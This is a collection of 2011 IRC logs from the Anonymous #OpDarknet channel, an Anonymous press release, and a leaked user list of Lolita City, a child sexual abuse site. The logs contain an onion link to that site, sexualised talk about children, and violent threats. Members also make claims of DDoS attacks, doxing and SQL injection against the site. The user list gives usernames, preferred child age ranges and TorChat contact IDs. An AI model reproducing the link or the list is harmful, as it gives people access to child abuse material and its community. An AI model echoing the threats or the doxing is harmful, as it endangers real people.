<lolita_fucker> Lolita City has over 200,000 hits a day
<*******> You have no fucking idea just how special i am!*
<lolita_fucker> that's probably more fucking web site traffic than your little
website in five years
<*******> Hate to break it to you mate, those are our bots. ;)
<*******> so you want us to shut it down?
<*******> it'd be no problem.
<*******> Ohshit, guys, shit shit
<*******> lolita_fucker to you
<*******> http://i.imgur.com/UDtzd.gif
<lolita_fucker> oh you don't fucking believe me?
<*******> how amazing you are is defined by how much trafic you can get
on your filthy paedo website.
<*******> this guy is so fucking cool.
<*******> because all the paedo's want to be his friend.
<*******> :D
<*******> Tbh, this brings up an interesting topic.
<*******> why don't you go get slaped in the face by a bag of baby dicks
Lolita.
<*******> thats what you're into right?
<*******> *******, if a man is seriously mentaly handicaped and has the
mental age of a young person is it still wrong for him to lust after young
people?
<*******> yea hes a danger to society
<lolita_fucker> oh
<*******> unfortunately
<*******> ...mmm yep.
<lolita_fucker> i have powerful friends
<*******> lolita_fucker, Sorry, you're a danger to society.
<*******> you're going to have to be put down.
<lolita_fucker> those thugs that roughed up your OWS
<lolita_fucker> over the weekend
<*******> ... you need chemical enhancement lolita.
<*******> something to chemically castrate you.
<*******> and then were all going to go
<lolita_fucker> were hired by some big shot investment banker at Goldman
Sachs
<*******> http://i.imgur.com/UDtzd.gif
<*******> remove those sick, fucked up urges.
<*******> Now give us your address and a team will be around to perform
the procedure with a sergical face waffle making curtosty of Doctor Martin.
<lolita_fucker> courtesy of me
* ******* yawns.
<*******> goldman sacks has more important shit to do.
<*******> Hahaha
<*******> and buddy you ain't in that club at all.
<*******> Goldmen sacks attacks the OWS because a filthy basment
dwellin paedo asked them too.
<lolita_fucker> as i told you
<lolita_fucker> i'm a business man
<lolita_fucker> i have a model agency
<*******> that can't do business for shit?
<*******> are you david ike?
<*******> alex jones?
<*******> Do lizard men rule the world?
<lolita_fucker> in Sweden, Dubai, Paris, and London
<*******> ;)
<*******> Modeling agency*
<*******> all the greatist basements eh?
<*******> you can't even spell your own buisness, ahahahhaha.
<*******> I got this great lot out in kansas I'd love to show you some time.
<*******> you can bring your pansey ass body guards too
<*******> lolita_fucker, do you understand that we could remove you from
this channel at any time.
<*******> but we don't because you're actualy really fucking amusing.
<lolita_fucker> if you don't fucking believe this shit i have check out Lolita
City: http://m3hjrfh4hlqc67gb.onion
<*******> http://i.imgur.com/UDtzd.gif
<*******> lolita_fucker if u are the admin
<*******> write this on the top "We will avenge you anonymous"
<*******> or whatever u want
<lolita_fucker> no but my IT tech support
<*******> HEY, GUYS, DON'T BELIEVE I'M A SUPER SRS BSNS
MAN 4 REAL CHECK OUT MY PAEDOPHILE RING
<lolita_fucker> put both a message on Freedom Hosting and Lolita City
about your epic fail
<lolita_fucker> Just in case it's not immediately obvious, the link at
http://pastebin.com/TDzM5G2y is proof of nothing more than having
searched google for some usernames. No private information is present in
that document, and there are no signs of infiltration or hacking. In short it's an
attempt to scare less knowledged users by spreading FUD. If there is
anything worth pointing out here it is that one should not use the same
username that is used in publi
<*******> Title: #OpDarknet Lolita City User Base Doxed - Pastebin.com
(at pastebin.com)
<*******> BECAUSE I'M A TOTALY LEGIT MODELING AGENCY
OWNER.
<lolita_fucker> you have no fucking idea
<lolita_fucker> how many boys and girls want to be models
<*******> paedo's are so lulz.
<lolita_fucker> i'm just giving them a way out
<*******> if they didn't fuck kids i could probably enjoy them.
<*******> that logic is infalable.
<*******> I think Im going to put his real idenity into circulation.
<*******> how bout ur case
<lolita_fucker> anyhow
<*******> why do we have ur ip address
<*******> and ur dox
<*******> your real ones
<*******> guys, i guess that todler just wanted to be modeling that cock in
her mouth so badly, he just offerd her a job.
<lolita_fucker> it's 7:40 am in Stockholm
<lolita_fucker> i have some models we going to feature on Lolita City
<lolita_fucker> have fun flapping to them boys
<*******> flapping to them boys?
* lolita_fucker has quit (Quit: pedos 4-ever)
More recent chat logs of the same individual on October 25, 2011:
* lolita_fucker ([email protected]) has joined #opdarknet
<lolita_fucker> hi you little cunts
<lolita_fucker> why is my fucking website all over the news now?
* ****** has quit (Client exited)
<lolita_fucker> i see it on BBC, Zdnet, etc
<******> website?
<lolita_fucker> WTF
<******> lolita city?
<lolita_fucker> fuck you and your little campaign against use!
<******> which site
<******> tz
<******> - Hostmask: [email protected] *
<******> fuck ursef
<******> we gonne own ya
<******> lawl
<******> for all we know... you could just be a troll
<******> yep:=
<******> lol it's you, you know your chats are getting us the most views on
pastebin right?
<******> but in every case
<******> i like telling him stuid :)
<******> lolita_fucker, UMAD?
<******> or *just in case*?
<******> looks like @ hypo
<lolita_fucker> why the hell are you fucking around with Lolita City and
Freedom Hosting for?
<******> btw lolita_fucker , wanna attack us? how about attacking
http://******/******/ :D
<******> Title: TaskBoard (at ******)
* ****** (****@***************) has joined #opdarknet
<******> lolita_fucker, check out: http://bit.ly/n1sjE5 that fits you perfectly
<******> https://twitter.com/#!/OpDarkNet/status/128752052343025664
<******> <OpDarkNet> lolita_fucker is now on the #OpDarkNet IRC
channel. Seems like he's mad. U MAD PEDO?
<******> @lolita
<******> all the press will inform the world about yourdirty shit
<lolita_fucker> oh fuck you
<******> so dont even think about step back
<lolita_fucker> you HAVE NOTHING AGAINST ME
<******> No thanks.
<******> We have your name.
<******> Btw anybody got a trace route on lolita_fucker ?
<******> And guess what.
<******> word.
<******> That's all we need.
<******> Can somebody do a Visual Basic program to find his location?
<******> seriously what is your problem?
<******> just quickly code it up
<lolita_fucker> fuck you all
* **** (***@****************) has joined #opdarknet
<******> uh
<******> im so scared
<******> :D
<lolita_fucker> i hate getting all this attention
<******> Awww...
<******> lolita_fucker: http://******/*****/
<******> Title: TaskBoard (at ******)
<******> lolita_fucker has a sad.
<******> and we gonne bring ya so much more attention
<lolita_fucker> what the fuck man?
<******> ya
<lolita_fucker> seriously my business is suffering because of your fags
<******> Good.
<******> so mission fucking accomplushid
<******> accomplished*
<lolita_fucker> you know i had to spend $3000 to get two more servers
because of your shitty ass "hacking"
<******> No one wants to buy you anymore pedo magazines?
<******> Aw. Well don't worry
<******> We'll make sure you spend a whole lot more than that.
<******> In federal prison.
<******> word.
* ****** has quit (Quit: AnonOps webchat)
<******> It's okay, they'll take you out of general pop.
<******> After every gang has fucked your asshole to a basketball hoop and
you get AIDS.
<******> Guys
<lolita_fucker> i am a fucking wealthy man
<******> anybody remember Hal Turner?
<lolita_fucker> you cannot get me, and you have no proof either
<******> lolita_fucker
<******> at this moment
* hunter has quit (Ping timeout: 121 seconds)
<******> Wait and see... (:
<******> gattering information
<******> 2 fuck ya
<******> so just wait
<******> :)
<******> we got time, so you 2?
<******> oh and anybody remember Hal Turner?
<******> if ya save , why so angry?
<******> seriously lolita_fucker what is your problem?
<******> do you have any guilt about what you are doing?
<lolita_fucker> fuck you all
<******> ohhh :(
<******> now im sad :(
<lolita_fucker> i am spending more money trying to get more servers
<******> and now?
<******> more servers 2 get down
<******> :)
<lolita_fucker> because of your shitty denial of service attacks
<******> Dude u cant win...
<******> lolita_fucker == Hal Turner == Butthurt
* ****** ([email protected]) has joined #opdarknet
<******> mh
<******> Well you will keep trying, and we will keep disabling your
disgusting warez.
<******> Until then, you can
* ****** has kicked lolita_fucker from #opdarknet (Expect us.)
<******> :)
* lolita_fucker ([email protected]) has joined #opdarknet
* ****** has kicked lolita_fucker from #opdarknet (Expect us.)
<******> Wiat
<******> stop
<******> ******
<******> data collection
<******> waiting to ban...
<******> ur an idiot
* pedolover ([email protected]) has joined #opdarknet
<******> if u ban him
<pedolover> fuck you all
<******> why
<******> ?
<******> Yeah why?
<******> We're only doing the morally right thing.
<pedolover> seriously what the fuck?
<******> omfg
<pedolover> it's our GOD given right that I can do what ever I want
<******> oh look
<******> like what?
<******> sry pedo
<pedolover> you cannot blame me that I love young girls
<******> you're a thw
<******> im atheist
<******> editor
<******> and its my atheistic right
<******> He's a thw admin/editor
<******> to fucking KICK YA ASSES
<******> He said the same thing on the wiki
<******> but pedolover god is against adultery
<******> god said u can do whatever u want
<******> but with punishment
<******> we're punishing you.
<pedolover> no adultery is cheating
<******> No lol
* ****** (******@******) has joined #opdarknet
<pedolover> loving a kid is not adultery
<******> Adultery in the bible says "Even thinking about the act is
committing the act already"
* ****** has quit (Connection closed)
<pedolover> the greeks were known to have boy fetishes
* ****** (******@******) has joined #opdarknet
* Lulzboat gives voice to ******
<******> mh
<pedolover> there is nothing wrong with me and the people who use Lolita
City
<pedolover> fuckers
<******> pedolover, can you understand why we do what we do?
<pedolover> you are fucking hackers
<pedolover> leave use alone
<******> pedolover, we have trouble understand why you do what you do
<pedolover> our minority community on the hidden wiki and Freedom
Hosting never did anything against you
<pedolover> serious wtf?
<******> Well its gone
<******> the hidden wiki
<******> is never going back up
<******> you know that right?
<******> i'm physically ddosing the server
<pedolover> now how the fuck i am i going to advertise our websites
<pedolover> ?
<******> you dont have to advertise them
<pedolover> i am losing precious web hosting customers
<******> advertise? how do you make money off a free site>?
<******> Is this him?
<******> if u donate to us
<******> Ooooh!
<pedolover> fucker
<******> maybe stuff will get better for us
<******> pedolover, Freedom Hosting is free, how can you lose money
<******> ^
<******> ^
<******> oh he means the customers
<******> Is this the real guy?
<pedolover> you have no idea some of sites my company Freedom Hosting
has
* ****** has quit (Ping timeout: 121 seconds)
<******> so you charge some of them/
<pedolover> for example the Hurt Forums is a site dedicated to rape and
underage trading
<pedolover> you have no fucking idea
<******> ..... wow what a fucking loser..
<******> can i kick him?
<******> Pedolover umad?
<******> I'm trying to understand if this is really a Free Speech issue or not
<******> Nooo
<******> Lets keep him
<******> Why pedoloversomad?
<******> okay we need more viewes :)
<******> Oh btw you can't marry a child.... sooo isn't that sodermy?
<pedolover> fuck you
<******> Na
<******> Im fine
<pedolover> in the US the legal age of marriage is 16
<******> you know that deep inside
<******> you know its true
<******> well you still can't marry a child
<******> pedolover, it varies by state to state
<******> hey pedolover, why do you even bother with what you do?
<******> Fuck
<******> Someone catch me up on this, afk
<******> pedolover, are you not from the US?
* rajraj has quit (Ping timeout: 121 seconds)
<pedolover> fuck you
<pedolover> i am a business man
<pedolover> i have a global modeling agency
<******> pedolover, watch your language, pls
<pedolover> own two night clubs
<pedolover> fuck you
<pedolover> i don't have time for your little faggetory
<******> Well you just have to make time seeing as we're in your face now.
<******> Pedolover, if you want us to leave you alone, you aren't winning
us over
<pedolover> yes i am a busy man
<pedolover> you have no fucking idea
<******> please give us a fucking idea
* ****** (*****@*********************) has joined #opdarknet
<pedolover> fuck you
<pedolover> you know how much it costs those fucking indians in india to
modify Lolita City?
* ****** (*****@*********************) has joined #opdarknet
<******> is that where the server is?
<******> pedolover
<******> we hacked freedom hosting
<pedolover> you fuckers did some fucked up pop up things and uploaded
your fag Anonymous logos
<******> and we have ur d0x
<******> wanna see em?
* ****** has quit (Quit: AnonOps webchat)
<******> ******, he probably doesn't know what d0x is
<******> good job anon. keep up the good work lads
<******> we know where u live pedolover
<******> ty ******
<******> pedolover, tell me this
<pedolover> fuck you
<******> Have you ever had a gun put in your mouth?
<pedolover> you have no idea who i am
<******> Wait, guys, who is this person
<******> Owner freedomhost
<******> The sheer fear of having your brain matter splattered all over the
walls?
<pedolover> i've put guns to people's heads
<******> Or Loli
<pedolover> fucker
<pedolover> i'll find you all
<******> Don't worry
<******> We'll find you first.
<******> ^
<******> am i the only one finding this wildly entertaining?
<******> We will show no mercy.
<******> we all hope you get raped in prison pedolover, your the bottem
bitch
<******> pedolover, we understand your loss, if you give us your name and
address we will send you a check in compensation
<pedolover> oh fuck yourself
<pedolover> you have no idea
* ****** (******@******************************) has joined
#opdarknet
<******> re
<pedolover> i run some of the largest TOR exit nodes on the network
* ****** is now known as ******
<pedolover> even if the FBI finds me
<******> oh yea
<******> look heres your stuff
<******> ****** prob not, im loving this ^^
<******> were into your system
<pedolover> they'll just find all your Anonymous ip's
<******> im going to pm u proof
<******> pedolover, if you are so upset, why not leave? no one wants you
here, so piss off you child raping filth.
<******> so why u worried about FBI? U american?
<******> check ur pm pedolover
<******> pedolover, pls stay
<******> and anyway pedolover ... why don't you get into manga more btw?
Doesn't manga stuff have all the stories that you want
<******> and even more?
<******> it can be more compelling than real kids
<******> good alternative aye?
<pedolover> fuck you
<pedolover> you have nothing against me!
<******> lol I'm prolly the most resonable of the bunch here
<******> you remember 'lolis'? there is alot of loli stories in manga
<******> pedolover if a police holds a sign that reads lolita city
<******> we will halt all attacks
<******> this suckers still her?
<******> lol
<******> come on, lad? Children? What could possibly find attractive about
that?
<******> we found you! :)
<******> Say cheese pedolover!
<******> ****** people are just fuked in the head
<******> thats all
<pedolover> fuck you
<******> :D
<pedolover> you have NOTHING against me
<******> we don't
<******> yea we do
<******> we have ur ip
<******> mother fucka
<pedolover> you won't even find my real hosting company that i run
Freedom Hosting behind
<pedolover> i'll give you all a little hint
<******> we're close buddy
<pedolover> it's in California
<******> oh btw pedolover PLEASE FIX YOUR PHP SERVER VERSION
<pedolover> fuckers
<******> it FAILS
<******> AND SUCKS
* ****** ([email protected]) has joined #opdarknet
<******> AND ITS OLD
<******> have you seen anon's list of all members? I had a look, and your
on there.
<pedolover> fucker
<pedolover> you NEVER hacked Freedom Hosting
<******> dudes
<******> oh, San Francisco?
<******> guys
<******> for my media sending
<******> sounds like he's upset.
<******> u got the logs?
<******> and can send me
<******> pedolover, umad?
<******> wanne implement it
<******> :)
<pedolover> all you ever did was run your little LOIC against it
<******> how do you hack pedo sites without looking at CP?
<******> lol pedolover is a noob for an admin
<******> LOIC?
<******> HAHA
<******> @anonguest disable images
<******> Oh that was the funniest thing ever.
<******> I dont think he's the admin
<******> yep
<******> loic in tor ^^
<pedolover> fuck you
<******> that isnt even possible
* ****** (*****@****************) has joined #opdarknet
<******> hes to stupid for an admin
<pedolover> i hire people to run Freedom hosting and Lolita City
<******> good for you
<pedolover> cuz I'M DA BOSSS
<******> good for you
<******> this has to be a troll
<******> yep
<******> yea I totally agree
<******> to stupid
<pedolover> fuck you all
<******> but I don't care
<******> hes funny
<******> change something on the webpage then
<******> true
<******> xD
* pedolover has quit (Quit: pedos 4-ever! )
#OpDarknet Release—th3j35t3r & Gulli.com
#OpDarknet Press Release - 10/18/2011
--
This release is concerning th3j35t3r and an article written by Annika Kremer
of www.gulli.com.
--
On 10/17/2011 an article was released on www.gulli.com concerning
#OpDarknet. We have not interviewed with this media source, or given them
any details on the operation, but would like to do so.
On another note, th3j35t3r has no involvement in this operation what so ever.
We have had no communication with th3j35t3r that we are aware of and
would like to clear the name. An individual who was working with
#OpDarknet made the account on the Lolita City server, this individual is no
longer working with us and the named account has been deleted. Again I say,
th3j35t3r has no involvement in this op and does not have a legitimate
account on Lolita City.
This is for www.gulli.com and all other media sources, if you want a story on
#OpDarknet, we are seeking media attention for this operation and are more
than willing to talk to you. Simply contact us on twitter @ArsonAnonymous
or via IRC irc.anonops.li channel #opdarknet.
--
We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.
Expect Us.
#OpDarknet—Lolita City user dump
As promised here is the entire user database of the 1589 users active on
Lolita City, an darknet trading site for pedos.
While we were not able to obtain the password credentials (they use an
SHA512 hash separate database to secure their passwords), but we were able
to determine the following info of the server location.
1) Using timing attacks with our Beowulf clusters located in Europe, Asia,
the US, and South Africa. we were able to determine an estimate TTL of the
server's location roughly in the USA.
2) The NGNIX server hosting the content is on a shared server (we used
select+benchmark SQLi to determine the MySQL performance) and did it
hold up after 10,000 packets.
3) The server was using hardened PHP with escaping. We were able to
bypass it with with UTF-16 ASCII encoding
We are suspending our attack on The Hidden Wiki, as we currently ran out
AT&T prepaid bandwidth for our NetBSD toaster. The "Nyan Nyan"
NetBSD toaster had to be put to death to with Thermite, Burning Man
Fashion.
Heed not, we have two more "Nyan Nyan" embedded NetBSD toaster cats in
the build process to take on these kiddie sites. Why the Nyan Nyan cat? For
kiddie porners, that's probably the only time they ever saw REAL pussy.
For the lulz, in the name of #antisec and #opdarknet. We are going to DBAN
our hard drives now. Also we have several pounds of Thermite to melt our
computers. Poor Nyan Nyan Cat, we miss you.
Fear not we will have two more embedded machines in a week to take on CP
sites. Fear the Pedo Bear kiddie porners, it's going to catch you soon!
#occupywallstreet, #freeanons, #freetopiary, #antisec
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
Expect us.
Lolita City User Dump (we will not post url's to these sites):
Username | Attraction | TorPM | TorChat | Images uploaded | Earnings | Future Earnings | User for
tagyourshit 5,6 - 12,14 5,6 - 12,14 49992 4 83 21 105 92 9 9mo, 5d
iGhost likes likes 4454 40 37 46 21 29 5mo, 1w
ls_lizard 5 - 12 9269 0 15 26 79 4w, 1d
bandigoo 4,6 - 8,10 bandigoo 37wwdoqyn37giuck 16798 3 71 38 14 0 10 9mo, 4w
7393874 4,7 - 13,18+ ba5hjdasocuolqj2 3990 0 12 97 29 4mo, 6h
cutelover 6051 16 38 7 54 75 6mo, 3d
rape-men 2,10 - 14 2 - 10 2173 1 42 61 6 70 24 6mo, 1w
gorgon 0,4 - 10,13 0 - 5,10 2621 0 5 61 52 5mo, 1w
AnonLGL 1,3 - 11,13 2721 0 4 85 17 3mo, 3d
quackup quackup 4330 4 60 12 4 70 51 9mo, 1d
Mikhal 6 - 13 Mikhal 5534 0 4 52 11 4mo, 2w
PairlessHussy 2,3 - 9,18+ 1944 0 4 36 45 3mo, 1w
Cypheurian 3,4 - 12,13 dhjin27h34ure7td 2188 0 4 14 88 3mo, 3d
epinbear 4,5 - 15,18+ epinbear 2kpeclj67evtzfmh 5997 2 25 90 3 1 41 10mo, 2d
pukuk 9,11 - 15,18+ pukuk 1541 76 34 2 84 7 9mo, 2w
Possum 0,2 - 6,18+ 1646 65 92 2 80 58 5mo, 4w
svet28 573 2 31 13 2 73 49 6mo, 3w
jyb 10 - 12,17 jyb 634 4 70 2 32 79 4mo, 2w
helios 5,8 - 10,14 5,8 - 10,14 3279 0 2 32 4 2mo, 2w
bollocks 7,9 - 13,18+ 10,12 - 15,18+ 1513 0 2 27 60 3mo, 2w
FTW FTW vim65rrzqplfv4bq 0 1 91 2 48 8mo, 4w
redhotchily 60 0 2 40 2mo, 4d
pepto 2,5 - 18+ 4,6 - 16 0 0 2 37 3mo, 2w
assfanatic 1,5 - 11,18+ 33 0 2 37 2mo, 4d
Anette_Fan 5,8 - 12,14 4 0 2 34 4mo, 1w
4bondage 0 1 89 2 32 8mo, 3w
nas 0 2 31 2 31 9mo, 2w
dejanbre999 4,6 - 12,17 54 0 2 30 1mo, 2w
japlover 88 0 2 26 3mo, 9h
OlJoe 0,5 - 12,18+ 0 0 2 25 6mo, 2w
PantyhosePedo 6 - 9 37 0 2 25 2w, 18h
Hawkenthorpe 4,6 - 12,18+ 10,11 - 12,13 0 0 2 14 3mo, 2d
Falko likes Falko ie7h37c4qmu5ccza 26 39 2 13 6mo, 1w
Blank 0 0 2 13 1w, 3d
khelx3 0 0 2 11 2mo, 3w
lolibovnik 35 2 6 2 6 9mo, 3w
aboutthattime 2,6 - 11,13 11 0 2 1 3mo, 2w
jogdesh 0 - 3,7 sqavhrovgd3krst3 15 0 1 91 2mo, 3h
mrick 3,9 - 12,16 2 86 1 89 6mo, 2d
lolitalover 0 1 74 1 85 9mo, 3w
cubyiffer 0 - 13 0 - 12 d7vdrg5hzxrq2llv 13 0 1 80 4mo, 6d
Timi 5,6 - 13,18+ 8,9 - 14,18+ 0 0 1 79 1mo, 2w
asdqwezxc 0 0 1 69 4mo, 2w
Play 7,8 - 14,16 wdivrb3pymkv3iey 35 0 1 69 3w, 5d
samual likes 18 0 1 67 5mo, 4w
PureEvil 0 1 2 1 65 9mo, 2w
qwert12345 7,9 - 13,15 68 0 1 64 5mo, 3d
rikarika rikarika 4xtzywahhj7k62e5 18 0 1 62 6mo, 1w
vsdelta 1,2 - 8,18+ 16 0 1 62 4mo, 3w
peterpan_ 40 0 1 60 5mo, 3w
opi 1,4 - 7,9 0 0 1 53 5mo, 2w
rinotmet 10,12 - 17,18+ 31 0 1 53 4mo, 4d
Booby30 0 - 3,5 14 0 1 43 5mo, 1w
Justinus 6,11 - 17,18+ 0 0 1 34 2w, 6d
ahoymatie 6,7 - 12,13 2 0 1 30 1mo, 4d
ThatOneGuy 5 0 1 30 2w, 5d
GirlHunter 0 0 1 27 5mo, 1d
littlelover 0 83 1 26 6mo, 4w
Arius 14 0 1 26 5mo, 1w
young_lvr 19 1 21 1 21 9mo, 3w
joedirt 6,8 - 10,11 0 84 1 21 8mo, 3w
LilGarter 13 0 1 17 3mo, 2w
Babypen 0 - 2,3 0 - 2,5 20 0 1 17 2mo, 2w
peterfile 52 1 16 1 16 9mo, 1w
1234567 0 0 1 16 2mo, 1d
aa2 17 1 15 1 15 8mo, 3w
katie14 0 1 14 1 14 9mo, 3w
big_muzzy 19 0 1 14 4mo, 1w
cccp 4,8 - 13,16 2 1 1 12 9mo, 2w
athlon652 10 0 1 10 4mo, 1w
IncstPeeFartLuv 1,2 - 11,18+ 0 0 1 2 2mo, 3w
lvyngholes 4,6 - 10,13 8,10 - 12,16 rqlj4pwk6pjhf2jr 0 0 1 2 2mo, 3d
benjibenji 5,6 - 11,12 y6d6qlcr6bytq2bb 15 0 99 2mo, 1d
SpankLEO 4,7 - 12,16 5,6 - 11,15 0 0 91 3mo, 2w
Pedobomber likes Pedobomber 14 84 87 6mo, 2d
spidermonkey44 25 0 85 1mo, 6d
Grllvr 3,4 - 9,12 17 0 84 1w, 5d
Sirpsychosexy 4 - 18+ vcb57wx2og2jdjge 11 0 79 1mo, 3d
marblehead07 marblehead07 5f74tqnbl2crkk45 15 0 75 5mo, 2w
Torito 11,12 - 16,18+ Me gustan blancas y rubias algun problema? jzcug7iglmw32iv2 5 0 75 1mo,
2w
chortle 0 58 74 5mo, 3w
Poul 0 0 73 5mo, 2w
CKP 2,3 - 8,11 1 0 73 5mo, 4d
SamSpade 10 10 70 7mo, 2w
dr-pic 5 0 70 5mo, 1w
Smints 0 0 70 4mo, 1w
nameless 0,1 - 10,18+ 0 0 68 3mo, 6d
PedMan 0 - 14 17 0 68 1mo, 5d
Raulic Raulic 5 0 65 5mo, 1d
cumshot 9 0 63 2mo, 1w
Kaysil 0 4 62 5mo, 3w
elkrakken 12 21 61 5mo, 3w
nattieluvzgirlz 6,8 - 12,15 15 0 60 5mo, 3w
toduk 4 - 10 tod1 p3ucthcpr7pxveip 19 0 60 1mo, 2w
xnice xnice mpqjty4wsfyqfyxj 9 31 59 9mo, 4w
ayhlonxp 7 0 57 3mo, 2w
bldpsy 6,8 - 13,17 Lv-M-Yng pgwl7pmjhhhdv7c2 6 0 55 3mo, 2d
qwertyu7 7,8 - 14,18+ ctzyg352jmsgnhge 5 0 55 2mo, 1w
Adriana likes 9 0 55 1w, 3d
grassoneta 3,5 - 12,15 Grassoneta w6nvewecqmuo7l7t 10 0 54 1mo, 1w
NickMiles 7,9 - 12,15 0 0 52 1mo, 4w
MaskedPedo 1,3 - 12,18+ 1,3 - 8,12 0 0 51 4mo, 1w
pdoman1526 0 - 14,16 0 - 10,12 pdoman1526 26 0 51 4w, 1d
Habarak 0 35 50 9mo, 1w
urbancowboy 15 0 50 6mo, 2w
GnoM 7 - 12 2 0 50 2mo, 1w
woody 1,5 - 8,13 0 0 48 2mo, 3w
netter_onkel 6 - 12 olswkgofszpiaugq 21 0 47 1mo, 2w
principe_nenis 0 - 15 5 - 12 pedo_principe e3ddehcxrjpyddoh 6 0 45 2mo, 4d
seppservus 0,3 - 12,18+ 0,3 - 10 xkaihsqw77sjnwp2 0 4 44 7mo, 3w
ncgnt 7 - 13,18+ 7 - 13 0 0 44 2mo, 6d
lurimax 4,7 - 12,15 0 0 43 2mo, 4w
pikoula 0 42 42 9mo, 3w
FBI 0 16 42 5mo, 4w
konkretzero 0 0 41 1mo, 5d
nepalo 13 0 40 5mo, 5d
graciefay 0 0 39 4mo, 4w
quee6KiJ 4,6 - 8,18+ 6 0 38 4mo, 1w
pan 2,3 - 12,14 xdpunxggh45dayh5 0 0 38 4mo, 4d
PedoElvis 3,5 - 12,18+ 3 0 36 2mo, 2w
nylonfreak 6 - 16 6 0 34 3mo, 1w
harlam 0 0 34 1w, 6d
Darwin 5,6 - 11,15 rmcvow6jmgmttrlr 0 0 31 1mo, 2w
koala 3 - 8,10 koala 0 0 31 1mo, 2w
invyrd 0 27 30 7mo, 6d
goodlover30 0 29 29 8mo, 3w
supplybitch 0 0 29 2mo, 2w
rhyedarkhero 0 27 27 9mo, 4w
rascal 2,7 - 18+ 2,4 - 18+ 0 0 27 2mo, 4w
karnak 5,6 - 11,12 0 0 27 4w, 1d
TrapLover 7 - 18+ 13 - 17 TrapLover 5 0 27 4d, 8h
traveller 0 0 26 4mo, 2d
testing 0,1 - 10,18+ 0 0 25 3mo, 1w
jamesb 0 - 16 0 - 16 yvnqp4vamxcpezfn 0 0 23 6mo, 6d
mabon 0 12 22 8mo, 1w
RizOrtolani 0 0 22 5mo, 2w
abgasik 3 0 22 3mo, 1d
jybhater 0 0 22 1mo, 2d
123456 1 0 21 8mo, 3w
JDBoy 0 20 20 8mo, 3w
hans00 2,3 - 18+ nexqbld4tk4jahoo 5 0 20 5mo, 3w
lancer1944 0 19 19 8mo, 4w
shadownig 1 1 19 8mo, 1w
oversan 2 0 18 4mo, 2w
Childlover 6 - 12 6 - 12 Childlover ibzirjrr4fvxy7uh 18 0 18 3mo, 1d
yoho 7,10 - 13,15 q6q4to4olfxmhccy 1 0 18 2mo, 1w
h5845k 0 0 18 3w, 2d
Yoshii 0 17 17 9mo, 3w
wesley 5 17 17 8mo, 4w
MadMax 0 0 17 1mo, 2w
hermes 0 0 16 8mo, 1w
TheSquirt 0 0 16 5mo, 2w
freeks 0 15 15 9mo, 2w
geileropa 3,4 - 8,11 mha4galdt6xme477 1 0 15 2mo, 2w
pd02 3 0 14 6mo, 1w
MeeYasi 0 5 14 6mo, 1w
Schlitzlecker 2,4 - 12,14 6 - 12 BoGi-Lover trbtvkocu2kbdkw5 2 0 14 2w, 1d
ikki 0 13 13 10mo, 1d
johnq 0 2 13 7mo, 1w
Boomerang 5,9 - 15,18+ 0,5 - 12,14 0 0 13 1mo, 2w
SirTagAlot 0 12 12 8mo, 3w
PederPedo 0 7 12 8mo, 1w
schlen 2 0 12 4mo, 2w
Sevanum 0 0 12 3w, 2d
little610 6 0 11 5mo, 5d
JBtor 0 10 10 10mo, 1d
malcontent 0 3 10 8mo, 5d
snow likes likes snow ghkvykfoz6didjka 2 0 10 6mo, 1d
stapler 0 6 10 5mo, 3w
slippy77 3 - 17 7 - 15 Slippy 3 0 10 4mo, 2w
Mommy 3,6 - 10,13 10,11 - 16 1 0 10 4mo, 3d
diaperdad 0 0 10 3mo, 2w
Lobo 0,7 - 15 0 0 10 2mo, 5d
seabeetard 1 9 9 8mo, 3w
pervert4kids 0 0 9 8mo, 2w
ardunt 0 9 9 8mo, 2w
maxdildo 1 1 9 8mo, 4d
randy 0 6 9 6mo, 3w
rwya 2 0 9 5mo, 3w
Volrath 0 0 9 4mo, 2w
odies 0 8 8 9mo, 4w
Proboon 0 8 8 9mo, 1w
fleckenzwerge 0 8 8 8mo, 2w
manaphy 10,12 - 17,18+ 11,13 - 16,17 1 0 8 4mo, 1w
shadow 0,4 - 9,12 0,3 - 6,9 6lvwt3a4oh3rnp3b 1 0 8 1mo, 3w
hardsex 0 0 7 4mo, 1w
8inches 1,3 - 10,16 1 0 7 1mo, 6d
KiddyCat 0 6 6 9mo, 1w
fred 0 6 6 8mo, 1w
ArtesDeath 0 0 6 8mo, 1w
Korny1 0 0 6 1mo, 1w
grobug 0 0 6 1mo, 4d
humbertfisgon 3 0 6 1mo, 1d
unsense 1 5 5 9mo, 3w
xeno 0 5 5 9mo, 3w
nymphs 0 5 5 9mo, 2w
WannaHaveFun 1 5 5 7mo, 2w
simply_beil 0 5 5 5mo, 3w
Imry 1 0 5 5mo, 6d
baba99 5,8 - 12,18+ 1 0 5 5mo, 1d
dex1970 5,6 - 11,12 hxxft3jvpyg4eavq 0 0 5 4mo, 4d
LuvCunny 3 - 10,14 3 - 8,10 LuvCunny dhwxynrn7qsogtaz 0 0 5 3mo, 3w
Lurch 5,9 - 13,18+ 11 - 13,18+ Lurch 0 0 5 3mo, 5d
youngpedolover 8,9 - 18+ 3 0 5 2mo, 2w
gollywoggle 3,6 - 16 1 0 5 2mo, 1w
london205 7 - 15 0 0 5 3w, 6d
befrind 0 4 4 9mo, 3w
hansdampf 0 4 4 9mo, 2w
qwerty321 0 4 4 9mo, 2w
mdrxd100 0 4 4 9mo, 9h
junkman 0 0 4 7mo, 3w
lupus 4 0 4 5mo, 3w
hunterman 1 0 4 5mo, 1w
pedoxperience 1,3 - 9,13 3 0 4 5mo, 3h
Bloc 8,10 - 18+ 0 0 4 3mo, 4w
PreteenFucker 4 - 12 1 0 4 3mo, 2w
TightHoles 5,8 - 12,15 3,5 - 12,15 TightHoles 2wz3cluhkty4sgdj 0 0 4 3mo, 1w
frecklelover 6,8 - 14,16 6,8 - 14 peeo7ecznjpuvcwx 0 0 4 2w, 6d
Baby_Lover 0 - 3,12 0,6 - 10,12 BabyLover alvpxebbd523e7qq 0 0 4 2w, 2d
Nekeri 0,3 - 7,13 95 0 2 13 60 3mo, 3w
Quentin 6,8 - 12,18+ 1070 0 2 10 35 5mo, 1w
Tundra 4,5 - 10,12 Tundra xdvctx6ajvyxwcuj 1938 0 2 2 79 1mo, 2d
